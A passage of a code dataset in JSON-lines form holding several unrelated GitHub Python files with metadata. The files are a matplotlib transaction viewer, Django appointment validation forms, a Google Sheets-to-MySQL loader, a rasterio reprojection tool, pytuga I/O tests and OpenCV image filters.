self.txt.set_text(selectionString)\n\n self.plotAx2()\n self.fig.canvas.draw()\n \n def makeButtons(self):\n\n pos = self.ax4.get_position() # get the position of axis ,which contains the buttons \n self.ax4.set_title('plot properties',bbox=self.box)\n rowNr, colNr = 2,2\n buttonwidth = 0.13\n buttonheight = 0.07\n Vspace = (pos.width - colNr*buttonwidth)/(colNr+1)\n Hspace = (pos.height - rowNr*buttonheight)/(rowNr+1)\n ## radio buttons\n scaleSelectorAx1 = self.fig.add_axes([pos.x0+Vspace, pos.y0+2*Hspace+buttonheight, buttonwidth, buttonheight],facecolor=PURPLE)\n scaleSelectorAx2 = self.fig.add_axes([pos.x0+Vspace, pos.y0+Hspace, buttonwidth, buttonheight],facecolor=PURPLE)\n modeSelectorAx1 = self.fig.add_axes([pos.x0+2*Vspace+buttonwidth, pos.y0+2*Hspace+buttonheight, buttonwidth, buttonheight],facecolor=PURPLE)\n \n scaleSelectorAx1.set_title('top plot scale',fontsize=12)\n scaleSelectorAx2.set_title('bottom plot scale',fontsize=12)\n modeSelectorAx1.set_title('top plot mode',fontsize=12)\n \n axcolor = PURPLE\n self.scaleSelector1 = RadioButtons(scaleSelectorAx1, ('logaritmic','linear'))\n self.scaleSelector2 = RadioButtons(scaleSelectorAx2, ('logaritmic','linear'))\n self.modeSelector = RadioButtons(modeSelectorAx1, ('transaction view', 'balance view'))\n \n for button in [self.scaleSelector1, self.scaleSelector2, self.modeSelector]:\n for circle in button.circles: # adjust radius here. The default is 0.05\n circle.set_radius(0.09)\n circle.set_edgecolor('black')\n \n ## small buttons\n resetAx = self.fig.add_axes([pos.x0+2*Vspace+buttonwidth, pos.y0+Hspace, buttonwidth/2, buttonheight])\n helpAx = self.fig.add_axes([pos.x0+2*Vspace+1.5*buttonwidth, pos.y0+Hspace, buttonwidth/2, buttonheight])\n self.resetBtn = Button(resetAx, 'Reset', color = PURPLE, hovercolor = DARK_RED)\n self.helpBtn = Button(helpAx, 'About', color = PURPLE, hovercolor = DARK_RED)\n\n def resetClicked(self,event):\n\n self.scale1='log'\n self.scale2='log'\n self.mode = 'transaction'\n self.start=None\n self.end = None\n self.plotAx1()\n self.plotAx2()\n self.scaleSelector1.set_active(0)\n self.scaleSelector2.set_active(0)\n self.modeSelector.set_active(0)\n self.fig.canvas.draw()\n\n def helpClicked(self,event):\n pass\n print ('help')\n helpText = \"\"\"Go to\n github.com/Wheele9/transaction-viewer\n to get the latest version, \n to create an issue or pull request.\n Feel free to contact me.\"\"\"\n self.txt.set_text(helpText)\n \n def modeButtonClicked(self, label):\n print (label)\n if label == 'balance view':\n if self.mode == 'balance': return\n self.mode = 'balance'\n self.scale1 = 'linear'\n self.plotAx1()\n elif label == 'transaction view':\n if self.mode == 'transaction': return\n self.mode = 'transaction'\n self.plotAx1()\n else: \n raise ValueError('could not find %s' % label)\n print ('clicked,', self.mode)\n self.fig.canvas.draw()\n \n def scaleButton1Clicked(self, label):\n\n if label == 'linear':\n if self.scale1 == 'linear': return\n self.scale1='linear'\n self.plotAx1()\n elif label == 'logaritmic':\n if self.scale1 == 'logaritmic': return\n self.scale1='log'\n self.plotAx1()\n else: raise ValueError('could not find %s' % label)\n self.fig.canvas.draw()\n \n def scaleButton2Clicked(self, label):\n\n if label == 'linear':\n if self.scale2 == 'linear': return\n self.scale2='linear'\n self.plotAx2()\n elif label == 'logaritmic':\n if self.scale2 == 'logaritmic': return\n self.scale2='log'\n self.plotAx2()\n else: raise ValueError('could not find %s' % label)\n self.fig.canvas.draw()\n \n def 
connectButtons(self):\n\n self.scaleSelector1.on_clicked(self.scaleButton1Clicked)\n self.scaleSelector2.on_clicked(self.scaleButton2Clicked)\n self.modeSelector.on_clicked(self.modeButtonClicked)\n \n self.resetBtn.on_clicked(self.resetClicked)\n self.helpBtn.on_clicked(self.helpClicked)\n \n def calculateAttributes(self):\n \n self.balance = self.cleanDf['balance'].values\n self.dateAxis = self.cleanDf['date'].values\n self.transactions = self.cleanDf['sum'].values\n self.pdDates = [pd.to_datetime(str(date), format='%Y%m%d') for date in self.dateAxis]\n\n start = self.pdDates[0]\n end = self.pdDates[-1]\n self.pdRange = pd.date_range(start=start, end=end, periods=None, freq='D', )\n\n def separateTransactions(self):\n\n values, counts = np.unique(self.pdDates, return_counts=True)\n maxPerDay = max(counts)\n\n expenseXs, expenseYs = [], []\n incomeX, incomeY = [], []\n smallX, smallY = [], []\n\n for freq in range(1,max(counts)+1):\n for val, cnt in zip(values, counts):\n if cnt >= freq:\n index = np.where(np.array(self.pdDates)==val)[0][freq-1]\n if self.transactions[index] > 0:\n incomeX.append(val)\n incomeY.append(self.transactions[index])\n else:\n smallX.append(val)\n smallY.append(-self.transactions[index])\n\n expenseXs.append(smallX) \n expenseYs.append(smallY) \n smallX, smallY = [], []\n\n self.expenseXs = expenseXs\n self.expenseYs = expenseYs\n self.incomeX = incomeX\n self.incomeY = incomeY\n \n def showPlots(self, cleanDf):\n self.cleanDf = cleanDf\n self.calculateAttributes()\n self.separateTransactions()\n \n self.createFigure()\n self.drawAxes()\n\n self.fig.canvas.mpl_connect('button_press_event', self.on_plot_hover) \n self.fig.subplots_adjust(left=0.06, bottom=0.07, right=0.97, top=0.95)\n \n self.makeButtons()\n self.connectButtons()\n\n plt.show()\n\nfolder='matyi'\n# folder='.'\n\nfiles =[os.path.join(folder,file) for file in os.listdir(folder) if file.lower().endswith('csv')]\n\nmodel = otpParser()\nview = financeViewer()\n\nmyApp = Presenter(model, view, files)\n\nmyApp.showPlots()\n\n\n", "repo_name": "Wheele9/transaction-viewer", "sub_path": "transactionViewer.py", "file_name": "transactionViewer.py", "file_ext": "py", "file_size_in_byte": 18714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 62, "usage_type": "attribute"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.subplot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.dates.num2date", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.dates.num2date", "line_number": 167, "usage_type": "call"}, {"api_name": "pandas.date_range", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.dates.DayLocator", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.widgets.SpanSelector", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 267, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 270, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 281, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 281, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 282, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.widgets.RadioButtons", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.widgets.RadioButtons", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.widgets.RadioButtons", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Button", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Button", "line_number": 352, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 434, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 434, "usage_type": "argument"}, {"api_name": "pandas.date_range", "line_number": 438, "usage_type": "call"}, 
{"api_name": "numpy.unique", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 452, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 483, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 483, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 488, "usage_type": "call"}, {"api_name": "os.path", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 488, "usage_type": "call"}]} +{"seq_id": "8551207232", "text": "from django.core.exceptions import ValidationError\nfrom django.forms.models import BaseModelForm, ModelFormMetaclass\nfrom .models import Unavailable, Appointment\n\nfrom django.utils import timezone\n\n\n# An abstract form that inherits methods used by both Appointment and UnavailableTime\n# models to perform cleaning that are unique to them both.\nclass AbstractDurationForm(BaseModelForm, metaclass=ModelFormMetaclass):\n\n def clean(self):\n self.extra_checks()\n super().clean()\n\n def extra_checks(self, model=None):\n # Field sanity checks\n self.check_future_time(\"start_time\")\n self.check_future_time(\"end_time\")\n self.check_positive_duration(\"start_time\", \"end_time\")\n # Overlaps\n if not model:\n model = self._meta.model\n self.check_for_overlaps(model)\n\n def check_for_overlaps(self, model):\n message = \"Please set an earlier or later date\"\n doctor = self.cleaned_data.get(\"doctor\")\n start_time = self.cleaned_data.get(\"start_time\")\n end_time = self.cleaned_data.get(\"end_time\")\n model = model\n doctors_appointments = model.objects.filter(doctor=doctor)\n # Check for overlapping appointments\n if doctors_appointments.filter(start_time=start_time):\n raise ValidationError({\"start_time\": message})\n if doctors_appointments.filter(start_time__lt=start_time) \\\n .filter(end_time__gte=start_time):\n raise ValidationError({\"start_time\": message})\n if doctors_appointments.filter(start_time__gt=start_time) \\\n .filter(start_time__lt=end_time):\n raise ValidationError({\"start_time\": message})\n\n # Check that time filled in form isn't in the past or present\n def check_future_time(self, field: str):\n now = timezone.now()\n time_to_set = self.cleaned_data.get(field)\n time_delta = time_to_set - now\n if time_delta.total_seconds() <= 0:\n raise ValidationError({field: \"Please set a later time\"})\n\n # Check that ending is ahead of starting\n def check_positive_duration(self, field_1: str, field_2: str):\n earlier = self.cleaned_data.get(field_1)\n later = self.cleaned_data.get(field_2)\n time_delta = later - earlier\n\n if time_delta.total_seconds() <= 0:\n message = f\"{field_2.title()} time must be ahead of {field_1.title()} time.\"\n raise ValidationError({field_2: message})\n\n\nclass UnavailableForm(AbstractDurationForm):\n\n class Meta:\n model = Unavailable\n exclude = [\"duration\", \"created\"]\n\n\nclass AppointmentForm(AbstractDurationForm):\n def extra_checks(self, model=None):\n super().extra_checks()\n model = Unavailable\n self.check_for_overlaps(model)\n\n class Meta:\n model = Appointment\n exclude = [\"duration, created\"]", "repo_name": "Agamiru/telemedicine_app", "sub_path": "appointments/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 2881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": 
"django.forms.models.BaseModelForm", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.models.ModelFormMetaclass", "line_number": 10, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 35, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 38, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 41, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 45, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 49, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Unavailable", "line_number": 65, "usage_type": "name"}, {"api_name": "models.Unavailable", "line_number": 72, "usage_type": "name"}, {"api_name": "models.Appointment", "line_number": 76, "usage_type": "name"}]} +{"seq_id": "34274824680", "text": "# These are the libraries used for this project.\nimport gspread\nimport mysql.connector\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# This is the mysqlcredentials.py file containing your credentials.\nimport mysqlcredentials as mc\n\n# The required variables for gspread:\nscope = ['https://spreadsheets.google.com/feeds', \\\n\t'https://www.googleapis.com/auth/drive']\n\n# The credentials created for the service account in your Google project\n# is stored in a .json file after you click 'Create Key'\n# I renamed this file to sheetstodb.json.\ncreds = ServiceAccountCredentials.from_json_keyfile_name('sheetstodb.json', scope)\nclient = gspread.authorize(creds)\n\n# Now that that's done, pull data from the Google sheet.\n# 'sheetName' describes the Google sheet's name,\n# 'worksheetIndex' describes the index of the worksheet at the bottom.\ndef GetSpreadsheetData(sheetName, worksheetIndex):\n sheet = client.open(sheetName).get_worksheet(worksheetIndex)\n return sheet.get_all_values()[1:]\n\n# Finally, write this data to MySQL:\ndef WriteToMySQLTable(sql_data, tableName):\n try:\n# Connection credentials for MySQL.\n connection = mysql.connector.connect(\n user = mc.user,\n password = mc.password,\n host = mc.host,\n database = mc.database\n )\n sql_drop = \" DROP TABLE IF EXISTS {} \".format(tableName)\n sql_create_table = \"\"\"CREATE TABLE {}( \n username VARCHAR(255),\n date_taken VARCHAR(16),\n time_started VARCHAR(16),\n time_finished VARCHAR(16),\n answer_question_1 VARCHAR(255),\n answer_question_2 VARCHAR(255),\n answer_question_3 VARCHAR(255),\n answer_question_4 VARCHAR(255),\n answer_question_5 VARCHAR(255),\n answer_question_6 VARCHAR(255),\n PRIMARY KEY (username)\n )\"\"\".format(tableName)\n\n sql_insert_statement = \"\"\"INSERT INTO {}( \n username,\n date_taken,\n time_started,\n time_finished,\n answer_question_1,\n answer_question_2,\n answer_question_3,\n answer_question_4,\n answer_question_5,\n answer_question_6\n ) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\".format(tableName)\n# Here we create a cursor, which we will use to execute\n# the MySQL statements above. 
After each statement is executed,\n# a message will be printed to the console if the execution was successful.\n cursor = connection.cursor()\n cursor.execute(sql_drop)\n print('Table {} has been dropped'.format(tableName))\n cursor.execute(sql_create_table)\n print('Table {} has been created'.format(tableName))\n# We need to write each row of data to the table, so we use a for loop\n# that will insert each row of data one at a time\n for i in sql_data:\n cursor.execute(sql_insert_statement, i)\n# Now we execute the commit statement, and print to the console\n# that the table was updated successfully\n connection.commit()\n print(\"Table {} successfully updated.\".format(tableName))\n# Errors are handled in the except block, and we will get\n# the information printed to the console if there is an error\n except mysql.connector.Error as error :\n connection.rollback()\n print(\"Error: {}. Table {} not updated!\".format(error, tableName))\n# We need to close the cursor and the connection,\n# and this needs to be done regardless of what happened above.\n finally:\n cursor.execute('SELECT COUNT(*) FROM {}'.format(tableName))\n rowCount = cursor.fetchone()[0]\n print(tableName, 'row count:', rowCount)\n if connection.is_connected():\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed.\")\n\n\n# Replaces any empty cells with 'NULL'\ndef preserveNULLValues(listName):\n print('Preserving NULL values...')\n for x in range(len(listName)):\n for y in range(len(listName[x])):\n if listName[x][y] == '':\n listName[x][y] = None\n print('NULL values preserved.')\n\n# Uses Google Drive's API.\n# If you get an error regarding this, go to the link and enable it.\ndata = GetSpreadsheetData('rogoben', 0)\n\n# Write to the table in the database.\npreserveNULLValues(data)\nWriteToMySQLTable(data, 'MyData')\n", "repo_name": "queenmypawn/rogoben", "sub_path": "gsheetstodb.py", "file_name": "gsheetstodb.py", "file_ext": "py", "file_size_in_byte": 4369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 16, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 16, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 17, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 30, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 30, "usage_type": "name"}, {"api_name": "mysqlcredentials.user", "line_number": 31, "usage_type": "attribute"}, {"api_name": "mysqlcredentials.password", "line_number": 32, "usage_type": "attribute"}, {"api_name": "mysqlcredentials.host", "line_number": 33, "usage_type": "attribute"}, {"api_name": "mysqlcredentials.database", "line_number": 34, "usage_type": "attribute"}, {"api_name": "mysql.connector.connector", "line_number": 81, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "5139687446", "text": "import os, sys\nimport rasterio\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\ndef create_folder(root_path,name_add):\n parent = os.path.dirname(root_path)\n foder_name = os.path.basename(root_path)\n if not os.path.exists(os.path.join(parent,foder_name+'_'+name_add)):\n 
os.makedirs(os.path.join(parent,foder_name+'_'+name_add))\n    path_create = os.path.join(parent,foder_name+'_'+name_add)\n    # print('created: {}'.format(path_create))\n    return path_create\n\ndef create_list_file_and_out_folder(path, name_folder):\n    # create the folder that will hold the new images\n    out_folder = create_folder(path, name_folder)\n    print(\"Created folder output: {}\".format(out_folder))\n    # done\n    list_image = []\n    for root, dirs, files in os.walk(path):\n        # print(root)\n        for file_ in files:\n            if file_.endswith(\".tif\"):\n                # list_image.append(os.path.join(root, file_))# returns a list of paths\n                list_image.append(file_)# returns a list of file names\n    return list_image, out_folder\n\ndef convert_epsg(image_path, out_path, out_epsg):\n    crs_new = rasterio.crs.CRS({\"init\":\"epsg:{}\".format(out_epsg)})\n    with rasterio.open(image_path) as src:\n        image = src.read((1, 2, 3))\n        tr = src.transform\n        height = src.height\n        width = src.width\n        num_band = src.count\n        dtypes = src.dtypes\n        # print(dtypes[0])\n    new_dataset = rasterio.open(out_path, 'w', driver='GTiff',\n                                height = height, width = width,\n                                count = num_band, dtype = dtypes[0],\n                                crs = crs_new,\n                                transform = tr,\n                                nodata = 0,\n                                compress='lzw')\n    if num_band == 1:\n        new_dataset.write(image, 1)\n    else:\n        for i in range(num_band):\n            new_dataset.write(image[i],i+1)\n    new_dataset.close()\n    \ndef main():\n    path_folder = os.path.abspath(sys.argv[1])\n    epsg_new = int((sys.argv[2]))\n    print(\"EPSG add: {}\".format(epsg_new))\n    list_img, out_folder = create_list_file_and_out_folder(path_folder, str(epsg_new))\n    for name_file in tqdm(list_img):\n        convert_epsg(os.path.join(path_folder, name_file), os.path.join(out_folder, name_file), epsg_new)\n\nif __name__==\"__main__\":\n    x1 = time.time()\n    main()\n    print(time.time() - x1, \"second\")\n\n\n\n\n\n\n# run without using abspath\n# path_folder = r\"/media/skm/Image/cezch/Data_Cezch/test\"\n# epsg_new = 32633\n\n", "repo_name": "anhbn995/GOGOOK", "sub_path": "Proccesing_all/convert_epsg.py", "file_name": "convert_epsg.py", "file_ext": "py", "file_size_in_byte": 2471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 22, "usage_type": "call"}, {"api_name": "rasterio.crs.CRS", "line_number": 31, "usage_type": "call"}, {"api_name": "rasterio.crs", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rasterio.open", "line_number": 32, "usage_type": "call"}, {"api_name": "rasterio.open", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, 
{"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 63, "usage_type": "call"}, {"api_name": "time.time", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "27375967197", "text": "import pytest\nfrom faker import Faker\nfrom random import randint\nimport pytuga.lib.tuga_io as tuga_io\nfake = Faker()\n\ndef test_mostrar_alerta(capsys):\n\trandom_name = fake.name()\n\ttuga_io.mostrar(random_name)\n\tout, err = capsys.readouterr()\n\tassert out == \"{}\\n\".format(random_name)\n\ttuga_io._alert(random_name)\n\tout, err = capsys.readouterr()\n\tassert out == \"{}\\n\".format(random_name)\n\ttuga_io.alerta(random_name)\n\tout, err = capsys.readouterr()\n\tassert out == \"{}\\n\".format(random_name)\n\ndef test_mostrar_formatado(capsys):\n\trandom_name = fake.name()\n\tname_tag = \"{} %s\".format(random_name)\n\trandom_int = randint(0, 100)\n\ttuga_io.mostrar_formatado(name_tag, random_int)\n\tout, err = capsys.readouterr()\n\tassert out == \"{} {}\\n\".format(random_name, random_int)\n\ndef test_pausar(capsys):\n\twith capsys.disabled():\n\t\ttuga_io.pausar()\n", "repo_name": "Transpyler/pytuga", "sub_path": "tests/test_tuga_io.py", "file_name": "test_tuga_io.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "faker.Faker", "line_number": 5, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io.mostrar", "line_number": 9, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 9, "usage_type": "name"}, {"api_name": "pytuga.lib.tuga_io._alert", "line_number": 12, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 12, "usage_type": "name"}, {"api_name": "pytuga.lib.tuga_io.alerta", "line_number": 15, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 15, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io.mostrar_formatado", "line_number": 23, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 23, "usage_type": "name"}, {"api_name": "pytuga.lib.tuga_io.pausar", "line_number": 29, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "44666732967", "text": "import cv2 as cv\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom skimage.metrics import structural_similarity, mean_squared_error, peak_signal_noise_ratio, normalized_mutual_information\r\nimport math\r\n\r\n## Start of image filters section\r\ndef lowPassFilter(in_file: str, out_file: str, size: int = 3, type: int = 1):\r\n \"\"\"This function applies a low pass filter to a grayscale image. 
The resulting image is then saved to disk\r\n The size parameter only affects type = 1 masks\r\n \"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Creating the matrix filter (sizeXsize)\r\n filter = np.ones((size, size))\r\n if (type == 1): # Type 1 filter\r\n filter = 1/size**2 * filter\r\n elif (type == 2): # Type 2 filter\r\n filter = np.array([[0.0625, 0.125, 0.0625], [0.125, 0.25, 0.125], [0.0625, 0.125, 0.0625]])\r\n elif (type == 3): # Type 3 filter\r\n filter = np.array([[0, 0.125, 0], [0.125, 0.5, 0.125], [0, 0.125, 0]])\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef highPassFilter(in_file: str, out_file: str, size: int = 3, sharpen: bool = False):\r\n \"\"\"This function applies a high pass filter to a grayscale image. The resulting image is then saved to disk\r\n sharpen = True, adds the resulting image to the original one so the edges are sharpened\r\n \"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Creating the matrix filter (sizeXsize)\r\n filter = -1/size**2 * np.ones((size, size))\r\n filter[math.floor(size/2), math.floor(size/2)] += 1.0\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n if sharpen:\r\n # The result gets added (and not substracted), because the center element (filter[math.floor(size/2), math.floor(size/2)]) is positive\r\n cv.imwrite(out_file, original + result)\r\n else:\r\n cv.imwrite(out_file, result)\r\n\r\ndef medianFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a median filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n \r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying mediang filter (sizeXsize)\r\n result = cv.medianBlur(original, size)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef hSobelFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a horizontal Sobel filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying horizontal Sobel filter (sizeXsize)\r\n result = cv.Sobel(original, -1, 1, 0, ksize=size)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef vSobelFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a vertical Sobel filter to a grayscale image. 
The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Applying vertical Sobel filter (sizeXsize)\r\n    result = cv.Sobel(original, -1, 0, 1, ksize=size)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef gaussianFilter(in_file: str, out_file: str, size: int = 3, sigmaX: float = 0):\r\n    \"\"\"This function applies a Gaussian blur filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Applying Gaussian filter (sizeXsize)\r\n    # if sigmaX = 0, it's calculated from the kernel size as follows: \r\n    # sigmaX = 0.3*((size-1)*0.5 - 1) + 0.8\r\n    result = cv.GaussianBlur(original, (size, size), 